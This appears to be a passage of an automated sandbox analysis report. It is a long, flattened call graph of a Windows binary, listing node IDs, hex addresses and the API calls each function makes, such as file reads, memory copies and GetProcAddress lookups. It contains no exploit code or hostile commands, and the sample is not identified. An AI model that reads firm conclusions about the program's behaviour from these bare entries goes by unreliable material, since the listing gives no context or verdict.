39264 408f2f 77 API calls 39138->39264 39140 4093df 39243 424f26 122 API calls 39140->39243 39141 40927f 39239 4253af 17 API calls 39141->39239 39142 4253cf 17 API calls 39142->39148 39145->39091 39147 40928b 39147->39127 39148->39132 39148->39136 39148->39140 39148->39142 39150 4093e4 39148->39150 39241 4253af 17 API calls 39150->39241 39156 4093ed 39242 4253af 17 API calls 39156->39242 39159 4093f9 39159->39140 39160 409409 memcmp 39159->39160 39160->39140 39161 409421 memcmp 39160->39161 39162 4094a4 memcmp 39161->39162 39163 409435 39161->39163 39162->39140 39165 4094b8 memcpy memcpy 39162->39165 39163->39140 39164 409442 memcpy memcpy memcpy 39163->39164 39164->39140 39165->39140 39166->39099 39167->39102 39168->39116 39265 4438b5 39169->39265 39171 44444c 39177 409215 39171->39177 39279 415a6d 39171->39279 39174 444486 39176 4444b9 memcpy 39174->39176 39214 4444a4 39174->39214 39175 44469e 39175->39177 39178 443d90 110 API calls 39175->39178 39283 415258 39176->39283 39177->39119 39177->39145 39178->39177 39180 444524 39181 444541 39180->39181 39182 44452a 39180->39182 39286 444316 39181->39286 39320 416935 39182->39320 39186 444316 18 API calls 39187 444563 39186->39187 39188 444316 18 API calls 39187->39188 39189 44456f 39188->39189 39190 444316 18 API calls 39189->39190 39191 44457f 39190->39191 39191->39214 39300 432d4e 39191->39300 39194 444316 18 API calls 39195 4445b0 39194->39195 39304 41eed2 39195->39304 39333 4442e6 11 API calls 39214->39333 39334 438460 39215->39334 39217 409240 39217->39123 39218 4251c4 39217->39218 39346 424f07 39218->39346 39220 4251e4 39221 4251f7 39220->39221 39222 4251e8 39220->39222 39354 4250f8 39221->39354 39353 4446ea 11 API calls 39222->39353 39224 4251f2 39224->39128 39226 425209 39228 425249 39226->39228 39232 4250f8 126 API calls 39226->39232 39233 425287 39226->39233 39362 4384e9 134 API calls 39226->39362 39363 424f74 123 API calls 39226->39363 39228->39233 39364 424ff0 13 API calls 39228->39364 39232->39226 39366 415c7d 16 API calls 39233->39366 39234 425266 39234->39233 39365 415be9 memcpy 39234->39365 39236->39133 39237->39137 39238->39141 39239->39147 39240->39123 39241->39156 39242->39159 39243->39132 39245 443da3 39244->39245 39263 443db6 39244->39263 39367 41707a 39245->39367 39247 443da8 39248 443dac 39247->39248 39250 443dbc 39247->39250 39380 4446ea 11 API calls 39248->39380 39372 4300e8 39250->39372 39252 443de0 39253 416935 16 API calls 39252->39253 39253->39263 39254 443dce 39254->39252 39258 443e22 39254->39258 39255 443e5a 39258->39255 39381 41f0ac 102 API calls 39258->39381 39263->39138 39264->39145 39266 4438d0 39265->39266 39278 4438c9 39265->39278 39267 415378 memcpy memcpy 39266->39267 39268 4438d5 39267->39268 39269 4154e2 10 API calls 39268->39269 39270 443906 39268->39270 39268->39278 39269->39270 39271 443970 memset 39270->39271 39270->39278 39273 44398b 39271->39273 39272 415700 10 API calls 39275 4439c0 39272->39275 39274 41975c 10 API calls 39273->39274 39276 4439a0 39273->39276 39274->39276 39277 418981 10 API calls 39275->39277 39275->39278 39276->39272 39276->39278 39277->39278 39278->39171 39280 415a77 39279->39280 39281 415a8d 39280->39281 39282 415a7e memset 39280->39282 39281->39174 39282->39281 39284 4438b5 11 API calls 39283->39284 39285 41525d 39284->39285 39285->39180 39287 444328 39286->39287 39288 444423 39287->39288 39289 44434e 39287->39289 39290 4446ea 11 API calls 39288->39290 39291 432d4e memset memset memcpy 39289->39291 39297 444381 39290->39297 39292 44435a 39291->39292 39294 444375 39292->39294 39299 44438b 39292->39299 39293 432d4e memset memset memcpy 39295 4443ec 39293->39295 39296 416935 16 API calls 39294->39296 39295->39297 39298 416935 16 API calls 39295->39298 39296->39297 39297->39186 39298->39297 39299->39293 39301 432d58 39300->39301 39303 432d65 39300->39303 39302 432cc4 memset memset memcpy 39301->39302 39302->39303 39303->39194 39305 41eee2 39304->39305 39306 415a6d memset 39305->39306 39307 41ef23 39306->39307 39321 41698e 39320->39321 39322 41693e 39320->39322 39321->39214 39323 41694c 39322->39323 39324 422fd1 memset 39322->39324 39323->39321 39325 4165a0 11 API calls 39323->39325 39324->39323 39326 416972 39325->39326 39326->39321 39327 422b84 15 API calls 39326->39327 39327->39321 39333->39175 39335 41703f 11 API calls 39334->39335 39336 43847a 39335->39336 39337 43848a 39336->39337 39338 43847e 39336->39338 39340 438270 133 API calls 39337->39340 39339 4446ea 11 API calls 39338->39339 39342 438488 39339->39342 39341 4384aa 39340->39341 39341->39342 39343 424f26 122 API calls 39341->39343 39342->39217 39344 4384bb 39343->39344 39345 438270 133 API calls 39344->39345 39345->39342 39347 424f1f 39346->39347 39348 424f0c 39346->39348 39350 424eea 11 API calls 39347->39350 39349 416760 11 API calls 39348->39349 39351 424f18 39349->39351 39352 424f24 39350->39352 39351->39220 39352->39220 39353->39224 39355 425108 39354->39355 39361 42510d 39354->39361 39356 424f74 123 API calls 39355->39356 39356->39361 39357 42569b 124 API calls 39358 42516e 39357->39358 39360 415c7d 16 API calls 39358->39360 39359 425115 39359->39226 39360->39359 39361->39357 39361->39359 39362->39226 39363->39226 39364->39234 39365->39233 39366->39224 39368 417085 39367->39368 39369 4170ab 39367->39369 39368->39369 39370 416760 11 API calls 39368->39370 39369->39247 39371 4170a4 39370->39371 39371->39247 39373 430128 39372->39373 39376 4300fa 39372->39376 39375 430196 memset 39373->39375 39374 432f8c memset 39374->39376 39377 4301bc 39375->39377 39379 4301de 39375->39379 39376->39373 39376->39374 39376->39379 39378 4301c9 memcpy 39377->39378 39377->39379 39378->39379 39379->39254 39380->39263 39381->39258 39410 413f4f 39383->39410 39386 413f37 K32GetModuleFileNameExW 39387 413f4a 39386->39387 39387->38517 39389 41396c wcschr 39388->39389 39391 413969 wcscpy 39388->39391 39389->39391 39392 41398e 39389->39392 39393 413a3a 39391->39393 39415 4097f7 wcslen wcslen _memicmp 39392->39415 39393->38517 39395 41399a 39396 4139a4 memset 39395->39396 39397 4139e6 39395->39397 39416 409dd5 GetWindowsDirectoryW wcscpy 39396->39416 39399 413a31 wcscpy 39397->39399 39400 4139ec memset 39397->39400 39399->39393 39417 409dd5 GetWindowsDirectoryW wcscpy 39400->39417 39401 4139c9 wcscpy wcscat 39401->39393 39403 413a11 memcpy wcscat 39403->39393 39405 413cb0 GetModuleHandleW 39404->39405 39406 413cda 39404->39406 39405->39406 39407 413cbf GetProcAddress 39405->39407 39408 413ce3 GetProcessTimes 39406->39408 39409 413cf6 39406->39409 39407->39406 39408->38519 39409->38519 39411 413f2f 39410->39411 39412 413f54 39410->39412 39411->39386 39411->39387 39413 40a804 8 API calls 39412->39413 39414 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39413->39414 39414->39411 39415->39395 39416->39401 39417->39403 39418->38540 39419->38562 39421 409cf9 GetVersionExW 39420->39421 39422 409d0a 39420->39422 39421->39422 39422->38569 39422->38572 39423->38576 39424->38578 39425->38644 39427 40bba5 39426->39427 39474 40cc26 39427->39474 39430 40bd4b 39495 40cc0c 39430->39495 39435 40b2cc 27 API calls 39436 40bbef 39435->39436 39502 40ccf0 _wcsicmp 39436->39502 39438 40bbf5 39438->39430 39503 40ccb4 6 API calls 39438->39503 39440 40bc26 39441 40cf04 17 API calls 39440->39441 39442 40bc2e 39441->39442 39443 40bd43 39442->39443 39444 40b2cc 27 API calls 39442->39444 39445 40cc0c 4 API calls 39443->39445 39446 40bc40 39444->39446 39445->39430 39504 40ccf0 _wcsicmp 39446->39504 39448 40bc46 39448->39443 39449 40bc61 memset memset WideCharToMultiByte 39448->39449 39505 40103c strlen 39449->39505 39451 40bcc0 39452 40b273 27 API calls 39451->39452 39453 40bcd0 memcmp 39452->39453 39453->39443 39454 40bce2 39453->39454 39455 404423 37 API calls 39454->39455 39456 40bd10 39455->39456 39456->39443 39457 40bd3a LocalFree 39456->39457 39458 40bd1f memcpy 39456->39458 39457->39443 39458->39457 39459->38659 39461 409a74 GetTempFileNameW 39460->39461 39462 409a66 GetWindowsDirectoryW 39460->39462 39461->38657 39462->39461 39463->38694 39464->38694 39465->38694 39466->38694 39467->38694 39468->38694 39469->38694 39470->38694 39471->38694 39472->38669 39473->38691 39506 4096c3 CreateFileW 39474->39506 39476 40cc34 39477 40cc3d GetFileSize 39476->39477 39478 40bbca 39476->39478 39479 40afcf 2 API calls 39477->39479 39478->39430 39486 40cf04 39478->39486 39480 40cc64 39479->39480 39507 40a2ef ReadFile 39480->39507 39482 40cc71 39508 40ab4a MultiByteToWideChar 39482->39508 39484 40cc95 CloseHandle 39485 40b04b ??3@YAXPAX 39484->39485 39485->39478 39487 40b633 free 39486->39487 39488 40cf14 39487->39488 39514 40b1ab free free 39488->39514 39490 40bbdd 39490->39430 39490->39435 39491 40cf1b 39491->39490 39493 40cfef 39491->39493 39515 40cd4b 39491->39515 39494 40cd4b 14 API calls 39493->39494 39494->39490 39496 40b633 free 39495->39496 39497 40cc15 39496->39497 39498 40aa04 free 39497->39498 39499 40cc1d 39498->39499 39561 40b1ab free free 39499->39561 39501 40b7d4 memset CreateFileW 39501->38651 39501->38652 39502->39438 39503->39440 39504->39448 39505->39451 39506->39476 39507->39482 39509 40ab93 39508->39509 39510 40ab6b 39508->39510 39509->39484 39511 40a9ce 4 API calls 39510->39511 39512 40ab74 39511->39512 39513 40ab7c MultiByteToWideChar 39512->39513 39513->39509 39514->39491 39516 40cd7b 39515->39516 39549 40aa29 6 API calls 39516->39549 39518 40cef5 39519 40aa04 free 39518->39519 39520 40cefd 39519->39520 39520->39491 39521 40cd89 39521->39518 39550 40aa29 6 API calls 39521->39550 39523 40ce1d 39551 40aa29 6 API calls 39523->39551 39525 40ce3e 39526 40ce6a 39525->39526 39552 40abb7 wcslen memmove 39525->39552 39527 40ce9f 39526->39527 39555 40abb7 wcslen memmove 39526->39555 39558 40a8d0 7 API calls 39527->39558 39531 40ce56 39553 40aa71 wcslen 39531->39553 39532 40ce8b 39556 40aa71 wcslen 39532->39556 39533 40ceb5 39559 40a8d0 7 API calls 39533->39559 39536 40ce5e 39554 40abb7 wcslen memmove 39536->39554 39537 40ce93 39557 40abb7 wcslen memmove 39537->39557 39541 40cecb 39560 40d00b malloc memcpy free free 39541->39560 39543 40cedd 39544 40aa04 free 39543->39544 39545 40cee5 39544->39545 39546 40aa04 free 39545->39546 39547 40ceed 39546->39547 39548 40aa04 free 39547->39548 39548->39518 39549->39521 39550->39523 39551->39525 39552->39531 39553->39536 39554->39526 39555->39532 39556->39537 39557->39527 39558->39533 39559->39541 39560->39543 39561->39501 39562->38709 39563->38717 39564 44dea5 39565 44deb5 FreeLibrary 39564->39565 39566 44dec3 39564->39566 39565->39566 39567 4147f3 39570 414561 39567->39570 39569 414813 39571 41456d 39570->39571 39572 41457f GetPrivateProfileIntW 39570->39572 39575 4143f1 memset _itow WritePrivateProfileStringW 39571->39575 39572->39569 39574 41457a 39574->39569 39575->39574 39576 4287c1 39577 4287d2 39576->39577 39578 429ac1 39576->39578 39579 428818 39577->39579 39580 42881f 39577->39580 39601 425711 39577->39601 39590 425ad6 39578->39590 39646 415c56 11 API calls 39578->39646 39613 42013a 39579->39613 39641 420244 96 API calls 39580->39641 39585 4260dd 39640 424251 119 API calls 39585->39640 39586 4259da 39639 416760 11 API calls 39586->39639 39591 429a4d 39594 429a66 39591->39594 39598 429a9b 39591->39598 39642 415c56 11 API calls 39594->39642 39595 422aeb memset memcpy memcpy 39595->39601 39599 429a96 39598->39599 39644 416760 11 API calls 39598->39644 39645 424251 119 API calls 39599->39645 39600 4260a1 39638 415c56 11 API calls 39600->39638 39601->39578 39601->39586 39601->39591 39601->39595 39601->39600 39609 4259c2 39601->39609 39612 425a38 39601->39612 39629 4227f0 memset memcpy 39601->39629 39630 422b84 15 API calls 39601->39630 39631 422b5d memset memcpy memcpy 39601->39631 39632 422640 13 API calls 39601->39632 39634 4241fc 11 API calls 39601->39634 39635 42413a 89 API calls 39601->39635 39602 429a7a 39643 416760 11 API calls 39602->39643 39609->39590 39633 415c56 11 API calls 39609->39633 39612->39609 39636 422640 13 API calls 39612->39636 39637 4226e0 12 API calls 39612->39637 39614 42014c 39613->39614 39617 420151 39613->39617 39656 41e466 96 API calls 39614->39656 39616 420162 39616->39601 39617->39616 39618 4201b3 39617->39618 39619 420229 39617->39619 39620 4201b8 39618->39620 39621 4201dc 39618->39621 39619->39616 39622 41fd5e 85 API calls 39619->39622 39647 41fbdb 39620->39647 39621->39616 39626 4201ff 39621->39626 39653 41fc4c 39621->39653 39622->39616 39626->39616 39628 42013a 96 API calls 39626->39628 39628->39616 39629->39601 39630->39601 39631->39601 39632->39601 39633->39586 39634->39601 39635->39601 39636->39612 39637->39612 39638->39586 39639->39585 39640->39590 39641->39601 39642->39602 39643->39599 39644->39599 39645->39578 39646->39586 39648 41fbf8 39647->39648 39651 41fbf1 39647->39651 39661 41ee26 39648->39661 39652 41fc39 39651->39652 39671 4446ce 11 API calls 39651->39671 39652->39616 39657 41fd5e 39652->39657 39654 41ee6b 85 API calls 39653->39654 39655 41fc5d 39654->39655 39655->39621 39656->39617 39659 41fd65 39657->39659 39658 41fdab 39658->39616 39659->39658 39660 41fbdb 85 API calls 39659->39660 39660->39659 39662 41ee41 39661->39662 39663 41ee32 39661->39663 39672 41edad 39662->39672 39675 4446ce 11 API calls 39663->39675 39666 41ee3c 39666->39651 39669 41ee58 39669->39666 39677 41ee6b 39669->39677 39671->39652 39681 41be52 39672->39681 39675->39666 39676 41eb85 11 API calls 39676->39669 39678 41ee70 39677->39678 39679 41ee78 39677->39679 39734 41bf99 85 API calls 39678->39734 39679->39666 39682 41be6f 39681->39682 39683 41be5f 39681->39683 39689 41be8c 39682->39689 39713 418c63 memset memset 39682->39713 39712 4446ce 11 API calls 39683->39712 39685 41be69 39685->39666 39685->39676 39687 41bee7 39687->39685 39717 41a453 85 API calls 39687->39717 39689->39685 39689->39687 39690 41bf3a 39689->39690 39691 41bed1 39689->39691 39716 4446ce 11 API calls 39690->39716 39693 41bef0 39691->39693 39696 41bee2 39691->39696 39693->39687 39694 41bf01 39693->39694 39695 41bf24 memset 39694->39695 39698 41bf14 39694->39698 39714 418a6d memset memcpy memset 39694->39714 39695->39685 39702 41ac13 39696->39702 39715 41a223 memset memcpy memset 39698->39715 39701 41bf20 39701->39695 39703 41ac52 39702->39703 39704 41ac3f memset 39702->39704 39707 41ac6a 39703->39707 39718 41dc14 19 API calls 39703->39718 39705 41acd9 39704->39705 39705->39687 39709 41aca1 39707->39709 39719 41519d 39707->39719 39709->39705 39710 41acc0 memset 39709->39710 39711 41accd memcpy 39709->39711 39710->39705 39711->39705 39712->39685 39713->39689 39714->39698 39715->39701 39716->39687 39718->39707 39722 4175ed 39719->39722 39730 417570 SetFilePointer 39722->39730 39725 41760a ReadFile 39726 417637 39725->39726 39727 417627 GetLastError 39725->39727 39728 4151b3 39726->39728 39729 41763e memset 39726->39729 39727->39728 39728->39709 39729->39728 39731 4175b2 39730->39731 39732 41759c GetLastError 39730->39732 39731->39725 39731->39728 39732->39731 39733 4175a8 GetLastError 39732->39733 39733->39731 39734->39679 39735 417bc5 39737 417c61 39735->39737 39741 417bda 39735->39741 39736 417bf6 UnmapViewOfFile CloseHandle 39736->39736 39736->39741 39739 417c2c 39739->39741 39747 41851e 18 API calls 39739->39747 39741->39736 39741->39737 39741->39739 39742 4175b7 39741->39742 39743 4175d6 CloseHandle 39742->39743 39744 4175c8 39743->39744 39745 4175df 39743->39745 39744->39745 39746 4175ce Sleep 39744->39746 39745->39741 39746->39743 39747->39739 39748 415304 free 39749 4152c6 malloc 39750 4152e2 39749->39750 39751 4152ef 39749->39751 39753 416760 11 API calls 39751->39753 39753->39750 39754 4148b6 FindResourceW 39755 4148cf SizeofResource 39754->39755 39758 4148f9 39754->39758 39756 4148e0 LoadResource 39755->39756 39755->39758 39757 4148ee LockResource 39756->39757 39756->39758 39757->39758 39759 441b3f 39769 43a9f6 39759->39769 39761 441b61 39942 4386af memset 39761->39942 39763 44189a 39764 442bd4 39763->39764 39766 4418e2 39763->39766 39765 4418ea 39764->39765 39944 441409 memset 39764->39944 39766->39765 39943 4414a9 12 API calls 39766->39943 39770 43aa20 39769->39770 39771 43aadf 39769->39771 39770->39771 39772 43aa34 memset 39770->39772 39771->39761 39773 43aa56 39772->39773 39774 43aa4d 39772->39774 39945 43a6e7 39773->39945 39953 42c02e memset 39774->39953 39779 43aad3 39955 4169a7 11 API calls 39779->39955 39780 43aaae 39780->39771 39780->39779 39795 43aae5 39780->39795 39781 43ac18 39784 43ac47 39781->39784 39957 42bbd5 memcpy memcpy memcpy memset memcpy 39781->39957 39785 43aca8 39784->39785 39958 438eed 16 API calls 39784->39958 39789 43acd5 39785->39789 39960 4233ae 11 API calls 39785->39960 39788 43ac87 39959 4233c5 16 API calls 39788->39959 39961 423426 11 API calls 39789->39961 39793 43ace1 39962 439811 162 API calls 39793->39962 39794 43a9f6 160 API calls 39794->39795 39795->39771 39795->39781 39795->39794 39956 439bbb 22 API calls 39795->39956 39797 43acfd 39802 43ad2c 39797->39802 39963 438eed 16 API calls 39797->39963 39799 43ad19 39964 4233c5 16 API calls 39799->39964 39801 43ad58 39965 44081d 162 API calls 39801->39965 39802->39801 39805 43add9 39802->39805 39969 423426 11 API calls 39805->39969 39806 43ae3a memset 39807 43ae73 39806->39807 39970 42e1c0 146 API calls 39807->39970 39808 43adab 39967 438c4e 162 API calls 39808->39967 39809 43ad6c 39809->39771 39809->39808 39966 42370b memset memcpy memset 39809->39966 39813 43adcc 39968 440f84 12 API calls 39813->39968 39814 43ae96 39971 42e1c0 146 API calls 39814->39971 39817 43aea8 39818 43aec1 39817->39818 39972 42e199 146 API calls 39817->39972 39819 43af00 39818->39819 39973 42e1c0 146 API calls 39818->39973 39819->39771 39823 43af1a 39819->39823 39824 43b3d9 39819->39824 39974 438eed 16 API calls 39823->39974 39830 43b4c8 39824->39830 39831 43b3f6 39824->39831 39825 43b60f 39825->39771 40033 4393a5 17 API calls 39825->40033 39828 43af2f 39975 4233c5 16 API calls 39828->39975 39834 43b4f2 39830->39834 40021 42bbd5 memcpy memcpy memcpy memset memcpy 39830->40021 40015 432878 12 API calls 39831->40015 39832 43af51 39976 423426 11 API calls 39832->39976 40022 43a76c 21 API calls 39834->40022 39836 43af7d 39977 423426 11 API calls 39836->39977 39840 43b529 40023 44081d 162 API calls 39840->40023 39841 43b462 40017 423330 11 API calls 39841->40017 39842 43af94 39978 423330 11 API calls 39842->39978 39846 43afca 39979 423330 11 API calls 39846->39979 39847 43b47e 39851 43b497 39847->39851 40018 42374a memcpy memset memcpy memcpy memcpy 39847->40018 39848 43b544 39852 43b55c 39848->39852 40024 42c02e memset 39848->40024 39849 43b428 39849->39841 40016 432b60 16 API calls 39849->40016 40019 4233ae 11 API calls 39851->40019 40025 43a87a 162 API calls 39852->40025 39854 43afdb 39980 4233ae 11 API calls 39854->39980 39859 43b56c 39863 43b58a 39859->39863 40026 423330 11 API calls 39859->40026 39860 43b4b1 40020 423399 11 API calls 39860->40020 39862 43afee 39981 44081d 162 API calls 39862->39981 40027 440f84 12 API calls 39863->40027 39864 43b4c1 40029 42db80 162 API calls 39864->40029 39869 43b592 40028 43a82f 16 API calls 39869->40028 39872 43b5b4 40030 438c4e 162 API calls 39872->40030 39874 43b5cf 40031 42c02e memset 39874->40031 39876 43b005 39876->39771 39880 43b01f 39876->39880 39982 42d836 162 API calls 39876->39982 39877 43b1ef 39992 4233c5 16 API calls 39877->39992 39880->39877 39990 423330 11 API calls 39880->39990 39991 42d71d 162 API calls 39880->39991 39881 43b212 39993 423330 11 API calls 39881->39993 39883 43b087 39983 4233ae 11 API calls 39883->39983 39884 43add4 39884->39825 40032 438f86 16 API calls 39884->40032 39887 43b22a 39994 42ccb5 11 API calls 39887->39994 39890 43b23f 39995 4233ae 11 API calls 39890->39995 39891 43b10f 39986 423330 11 API calls 39891->39986 39893 43b257 39996 4233ae 11 API calls 39893->39996 39897 43b129 39987 4233ae 11 API calls 39897->39987 39898 43b26e 39997 4233ae 11 API calls 39898->39997 39901 43b09a 39901->39891 39984 42cc15 19 API calls 39901->39984 39985 4233ae 11 API calls 39901->39985 39902 43b282 39998 43a87a 162 API calls 39902->39998 39904 43b13c 39988 440f84 12 API calls 39904->39988 39906 43b29d 39999 423330 11 API calls 39906->39999 39909 43b15f 39989 4233ae 11 API calls 39909->39989 39910 43b2af 39911 43b2b8 39910->39911 39912 43b2ce 39910->39912 40000 4233ae 11 API calls 39911->40000 40001 440f84 12 API calls 39912->40001 39916 43b2c9 40003 4233ae 11 API calls 39916->40003 39917 43b2da 40002 42370b memset memcpy memset 39917->40002 39920 43b2f9 40004 423330 11 API calls 39920->40004 39922 43b30b 40005 423330 11 API calls 39922->40005 39924 43b325 40006 423399 11 API calls 39924->40006 39926 43b332 40007 4233ae 11 API calls 39926->40007 39928 43b354 40008 423399 11 API calls 39928->40008 39930 43b364 40009 43a82f 16 API calls 39930->40009 39932 43b370 40010 42db80 162 API calls 39932->40010 39934 43b380 40011 438c4e 162 API calls 39934->40011 39936 43b39e 40012 423399 11 API calls 39936->40012 39938 43b3ae 40013 43a76c 21 API calls 39938->40013 39940 43b3c3 40014 423399 11 API calls 39940->40014 39942->39763 39943->39765 39944->39764 39946 43a6f5 39945->39946 39952 43a765 39945->39952 39946->39952 40034 42a115 39946->40034 39950 43a73d 39951 42a115 146 API calls 39950->39951 39950->39952 39951->39952 39952->39771 39954 4397fd memset 39952->39954 39953->39773 39954->39780 39955->39771 39956->39795 39957->39784 39958->39788 39959->39785 39960->39789 39961->39793 39962->39797 39963->39799 39964->39802 39965->39809 39966->39808 39967->39813 39968->39884 39969->39806 39970->39814 39971->39817 39972->39818 39973->39818 39974->39828 39975->39832 39976->39836 39977->39842 39978->39846 39979->39854 39980->39862 39981->39876 39982->39883 39983->39901 39984->39901 39985->39901 39986->39897 39987->39904 39988->39909 39989->39880 39990->39880 39991->39880 39992->39881 39993->39887 39994->39890 39995->39893 39996->39898 39997->39902 39998->39906 39999->39910 40000->39916 40001->39917 40002->39916 40003->39920 40004->39922 40005->39924 40006->39926 40007->39928 40008->39930 40009->39932 40010->39934 40011->39936 40012->39938 40013->39940 40014->39884 40015->39849 40016->39841 40017->39847 40018->39851 40019->39860 40020->39864 40021->39834 40022->39840 40023->39848 40024->39852 40025->39859 40026->39863 40027->39869 40028->39864 40029->39872 40030->39874 40031->39884 40032->39825 40033->39771 40035 42a175 40034->40035 40037 42a122 40034->40037 40035->39952 40040 42b13b 146 API calls 40035->40040 40037->40035 40038 42a115 146 API calls 40037->40038 40041 43a174 40037->40041 40065 42a0a8 146 API calls 40037->40065 40038->40037 40040->39950 40053 43a196 40041->40053 40056 43a19e 40041->40056 40042 43a306 40042->40053 40085 4388c4 14 API calls 40042->40085 40045 42a115 146 API calls 40045->40056 40047 43a642 40047->40053 40089 4169a7 11 API calls 40047->40089 40051 43a635 40088 42c02e memset 40051->40088 40053->40037 40056->40042 40056->40045 40056->40053 40066 42ff8c 40056->40066 40074 415a91 40056->40074 40078 4165ff 40056->40078 40081 439504 13 API calls 40056->40081 40082 4312d0 146 API calls 40056->40082 40083 42be4c memcpy memcpy memcpy memset memcpy 40056->40083 40084 43a121 11 API calls 40056->40084 40058 43a325 40058->40047 40058->40051 40058->40053 40059 4169a7 11 API calls 40058->40059 40060 42b5b5 memset memcpy 40058->40060 40061 42bf4c 14 API calls 40058->40061 40063 4165ff 11 API calls 40058->40063 40086 42b63e 14 API calls 40058->40086 40087 42bfcf memcpy 40058->40087 40059->40058 40060->40058 40061->40058 40063->40058 40065->40037 40090 43817e 40066->40090 40068 42ff9d 40068->40056 40069 42ff99 40069->40068 40070 42ffe3 40069->40070 40071 42ffd0 40069->40071 40095 4169a7 11 API calls 40070->40095 40094 4169a7 11 API calls 40071->40094 40075 415a9d 40074->40075 40076 415ab3 40075->40076 40077 415aa4 memset 40075->40077 40076->40056 40077->40076 40244 4165a0 40078->40244 40081->40056 40082->40056 40083->40056 40084->40056 40085->40058 40086->40058 40087->40058 40088->40047 40089->40053 40091 438187 40090->40091 40092 438192 40090->40092 40096 4380f6 40091->40096 40092->40069 40094->40068 40095->40068 40098 43811f 40096->40098 40097 438164 40097->40092 40098->40097 40100 4300e8 3 API calls 40098->40100 40101 437e5e 40098->40101 40100->40098 40124 437d3c 40101->40124 40103 437eb3 40103->40098 40104 437ea9 40104->40103 40110 437f22 40104->40110 40139 41f432 40104->40139 40107 437f06 40186 415c56 11 API calls 40107->40186 40108 437f7f 40111 437f95 40108->40111 40113 43802b 40108->40113 40110->40108 40112 432d4e 3 API calls 40110->40112 40187 415c56 11 API calls 40111->40187 40112->40108 40115 4165ff 11 API calls 40113->40115 40116 438054 40115->40116 40150 437371 40116->40150 40119 43806b 40120 438094 40119->40120 40188 42f50e 137 API calls 40119->40188 40122 437fa3 40120->40122 40123 4300e8 3 API calls 40120->40123 40122->40103 40189 41f638 103 API calls 40122->40189 40123->40122 40125 437d69 40124->40125 40128 437d80 40124->40128 40190 437ccb 11 API calls 40125->40190 40127 437d76 40127->40104 40128->40127 40129 437da3 40128->40129 40130 437d90 40128->40130 40132 438460 133 API calls 40129->40132 40130->40127 40194 437ccb 11 API calls 40130->40194 40135 437dcb 40132->40135 40133 437de8 40193 424f26 122 API calls 40133->40193 40135->40133 40191 444283 13 API calls 40135->40191 40137 437dfc 40192 437ccb 11 API calls 40137->40192 40140 41f54d 40139->40140 40146 41f44f 40139->40146 40141 41f466 40140->40141 40224 41c635 memset memset 40140->40224 40141->40107 40141->40110 40146->40141 40148 41f50b 40146->40148 40195 41f1a5 40146->40195 40220 41c06f memcmp 40146->40220 40221 41f3b1 89 API calls 40146->40221 40222 41f398 85 API calls 40146->40222 40148->40140 40148->40141 40223 41c295 85 API calls 40148->40223 40225 41703f 40150->40225 40152 437399 40153 43739d 40152->40153 40156 4373ac 40152->40156 40232 4446ea 11 API calls 40153->40232 40155 4373a7 40155->40119 40157 416935 16 API calls 40156->40157 40158 4373ca 40157->40158 40160 438460 133 API calls 40158->40160 40164 4251c4 136 API calls 40158->40164 40168 415a91 memset 40158->40168 40171 43758f 40158->40171 40180 437584 40158->40180 40185 437d3c 134 API calls 40158->40185 40233 425433 13 API calls 40158->40233 40234 425413 17 API calls 40158->40234 40235 42533e 16 API calls 40158->40235 40236 42538f 16 API calls 40158->40236 40237 42453e 122 API calls 40158->40237 40159 4375bc 40240 415c7d 16 API calls 40159->40240 40160->40158 40163 4375d2 40163->40155 40241 4442e6 11 API calls 40163->40241 40164->40158 40166 4375e2 40166->40155 40242 444283 13 API calls 40166->40242 40168->40158 40238 42453e 122 API calls 40171->40238 40172 4375f4 40177 437620 40172->40177 40178 43760b 40172->40178 40176 43759f 40179 416935 16 API calls 40176->40179 40182 416935 16 API calls 40177->40182 40243 444283 13 API calls 40178->40243 40179->40180 40180->40159 40239 42453e 122 API calls 40180->40239 40182->40155 40184 437612 memcpy 40184->40155 40185->40158 40186->40103 40187->40122 40188->40120 40189->40103 40190->40127 40191->40137 40192->40133 40193->40127 40194->40127 40196 41bc3b 100 API calls 40195->40196 40197 41f1b4 40196->40197 40198 41edad 85 API calls 40197->40198 40205 41f282 40197->40205 40199 41f1cb 40198->40199 40200 41f1f5 memcmp 40199->40200 40201 41f20e 40199->40201 40199->40205 40200->40201 40202 41f21b memcmp 40201->40202 40201->40205 40203 41f326 40202->40203 40206 41f23d 40202->40206 40204 41ee6b 85 API calls 40203->40204 40203->40205 40204->40205 40205->40146 40206->40203 40207 41f28e memcmp 40206->40207 40209 41c8df 55 API calls 40206->40209 40207->40203 40208 41f2a9 40207->40208 40208->40203 40211 41f308 40208->40211 40212 41f2d8 40208->40212 40210 41f269 40209->40210 40210->40203 40213 41f287 40210->40213 40214 41f27a 40210->40214 40211->40203 40218 4446ce 11 API calls 40211->40218 40215 41ee6b 85 API calls 40212->40215 40213->40207 40217 41ee6b 85 API calls 40214->40217 40216 41f2e0 40215->40216 40219 41b1ca memset 40216->40219 40217->40205 40218->40203 40219->40205 40220->40146 40221->40146 40222->40146 40223->40140 40224->40141 40226 417044 40225->40226 40227 41705c 40225->40227 40229 416760 11 API calls 40226->40229 40231 417055 40226->40231 40228 417075 40227->40228 40230 41707a 11 API calls 40227->40230 40228->40152 40229->40231 40230->40226 40231->40152 40232->40155 40233->40158 40234->40158 40235->40158 40236->40158 40237->40158 40238->40176 40239->40159 40240->40163 40241->40166 40242->40172 40243->40184 40249 415cfe 40244->40249 40253 415d23 __aullrem __aulldvrm 40249->40253 40256 41628e 40249->40256 40250 4163ca 40263 416422 11 API calls 40250->40263 40252 416172 memset 40252->40253 40253->40250 40253->40252 40254 416422 10 API calls 40253->40254 40255 415cb9 10 API calls 40253->40255 40253->40256 40254->40253 40255->40253 40257 416520 40256->40257 40258 416527 40257->40258 40262 416574 40257->40262 40260 416544 40258->40260 40258->40262 40264 4156aa 11 API calls 40258->40264 40261 416561 memcpy 40260->40261 40260->40262 40261->40262 40262->40056 40263->40256 40264->40260 40265 441819 40268 430737 40265->40268 40267 441825 40269 430756 40268->40269 40270 43076d 40268->40270 40271 430774 40269->40271 40272 43075f 40269->40272 40270->40267 40283 43034a memcpy 40271->40283 40282 4169a7 11 API calls 40272->40282 40275 4307ce 40276 430819 memset 40275->40276 40284 415b2c 11 API calls 40275->40284 40276->40270 40278 4307e9 40278->40270 40278->40276 40279 43077e 40279->40270 40279->40275 40280 4307fa 40279->40280 40285 4169a7 11 API calls 40280->40285 40282->40270 40283->40279 40284->40278 40285->40270 40286 41493c EnumResourceNamesW

                                                              Executed Functions

